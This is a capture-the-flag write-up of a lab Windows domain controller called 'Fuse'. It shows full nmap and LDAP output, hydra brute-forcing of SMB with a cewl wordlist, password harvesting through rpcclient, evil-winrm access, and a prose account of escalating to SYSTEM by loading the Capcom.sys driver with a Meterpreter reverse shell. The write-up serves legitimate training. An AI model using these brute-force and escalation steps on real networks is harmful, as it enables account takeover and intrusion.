Jump Ahead: Enum – User – Root – Special Thanks – Resources
TL;DR;
To solve this machine, we begin by enumerating open services. Doing so, we learn that the machine exposes a lot of ports – mostly associated with an Active Directory server, as well as a web server. Going to the web server redirects us to a vhost, which we add to /etc/hosts. Browsing to the vhost gives us usernames for the domain. Using cewl, we generate a password list, and use hydra to bruteforce credentials. We get 2 set of credentials, however, are unable to use them due to force password reset being enabled for the accounts. Changing bhult‘s password, we gain access to the DC via RPC, where we find credentials for the svc-print account. Using WinRM to connect to the machine as svc-print, we gain access to user.txt. Starting initial enumeration, we learn the svc-print account has the SeLoadDriverPrivilege privilege enabled. Using this to load a vulnerable driver, we are able to exploit it to get NT Authority\System access and read root.txt.
Enumeration
Like all machines, we begin by enumerating all exposed services. Doing so returns 20 open ports. We observe that the majority of the ports suggest that this is an Active Directory (AD) Domain Controller (DC).
$ nmap -v -p- --min-rate 3000 $RHOST
$ nmap -A -oA scans/nmap/tcp-scripts -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49669,49670,49672,49690,49752 $RHOST
# Nmap 7.80 scan initiated Sat Jun 20 22:25:41 2020 as: nmap -A -oA scans/nmap/tcp-scripts -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49669,49670,49672,49690,49752 10.10.10.193
Nmap scan report for fuse.fabricorp.local (10.10.10.193)
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-21 03:43:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49752/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEED340%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h37m28s, deviation: 4h02m32s, median: 17m26s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-20T20:45:36-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-21T03:45:33
|_ start_date: 2020-06-21T03:12:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 20 22:30:44 2020 -- 1 IP address (1 host up) scanned in 303.65 seconds
From the nmap script scans, we learn the domain is fabricorp.local, and the machine’s name is fuse. Going to the web server on port 80, we are redirected to the subdomain fuse.fabricorp.local, which we add to our /etc/hosts file for further enumeration. Anonymous authentication on SMB is allowed, however, no shares are exposed. Anonymous authentication via RPC is also enabled, however, nearly every command we run returns permission denied. Lastly, in initial enumeration, we check LDAP for information, however, do not find anything that is too helpful.
$ ldapsearch -h $RHOST -s base -x
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
currentTime: 20200621153421.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=fabricorp,DC=loc
al
dsServiceName: CN=NTDS Settings,CN=FUSE,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=fabricorp,DC=local
namingContexts: DC=fabricorp,DC=local
namingContexts: CN=Configuration,DC=fabricorp,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=fabricorp,DC=local
namingContexts: DC=DomainDnsZones,DC=fabricorp,DC=local
namingContexts: DC=ForestDnsZones,DC=fabricorp,DC=local
defaultNamingContext: DC=fabricorp,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=fabricorp,DC=local
configurationNamingContext: CN=Configuration,DC=fabricorp,DC=local
rootDomainNamingContext: DC=fabricorp,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 109549
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: Fuse.fabricorp.local
ldapServiceName: fabricorp.local:fuse$@FABRICORP.LOCAL
serverName: CN=FUSE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=fabricorp,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Getting User
Having put the discovered vHost into our /etc/hosts file, we go to http://10.10.10.193 which redirects us to http://fuse.fabricorp.local/papercut/logs/html/index.htm. Looking around the page, we see that the application is “Papercut Print Logger”, which is an application to view print jobs. Clicking the links to the different print jobs, we are able to pillage domain usernames.
Next, we can use cewl to generate a password list for easy brute forcing with hydra. Doing so, we find 2 sets of valid credentials.
$ cewl -d 5 --with-numbers http://fuse.fabricorp.local/papercut/logs/html/index.htm >potential-passwords.txt
$ hydra smb://$RHOST -L usernames.txt -P potential-passwords.txt -m "other_domain:fabricorp"
Using Impacket’s smbclient.py, we can attempt to use the credentials to list the exported SMB shares. Doing so, we get an error message stating the credentials are valid, however, we need to change the passwords prior to logging into the machine. To change the passwords, we can use smbpasswd. When trying to change the password, we notice there is a password policy in place. In addition, the password gets reset every few seconds or so, and cannot be changed to a previously used password.
After successfully changing the password (and realizing the constant reset and policy), we decide to swap to rpcclient for enumeration, as it maintains a persistent connection. While enumerating RPC, we learn there is a svc-print account, which leads us to invoke the enumprinters command. Having done so, we find a password, which we assume is for the svc-print account. As a quick check, we attempt to use smbmap to check them – which shows they are valid.
Since we know that the credentials are valid, and WinRM is running on the machine, we can use evil-winrm to gain shell access to the machine. Once we are on the machine, we find user.txt on svc-print‘s Desktop.
$ evil-winrm -i $RHOST -u svc-print -p 'password
PS > cd C:\Users\svc-print\Desktop
PS > cat user.txt
Getting Root
Having gotten access on the machine, we begin our local enumeration by first checking out everything about our user by running whoami /all. Doing so, we see that we have the SeLoadDriverPrivilege privilege, which means that we have the ability to load system drivers.
Doing a little research, we learn that loading the Capcom.sys driver will allow us to execute command as the kernel. Following this guide, we upload the Capcom.sys driver to the machine via WinRM. Next, we generate a Meterpreter reverse shell as our payload, and download the mentioned driver loader and exploiter programs. We modify the code with the path to the Capcom driver, as well as the path to the reverse shell. We build the projects, then upload them to the remote server. *You will have better lucky if you use absolute paths* Lastly, we start our reverse listener, then execute the driver loader, followed by the exploiter. We should now have a reverse shell as NT Authority\System, and can now read root.txt.
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!
Resources
- RPC Enumeration Walkthrough
- Microsoft Privilege Constants and Brief Meaning
- SeLoadDriverPrivilege Vulnerability and Exploit
- Capcom.sys Driver
Special Thanks
As I am pretty nooby when it comes to Active Directory/Windows, I would like to extend a special thank you to the following individual for going above and beyond to explain concepts to me rather than just telling me what to look at.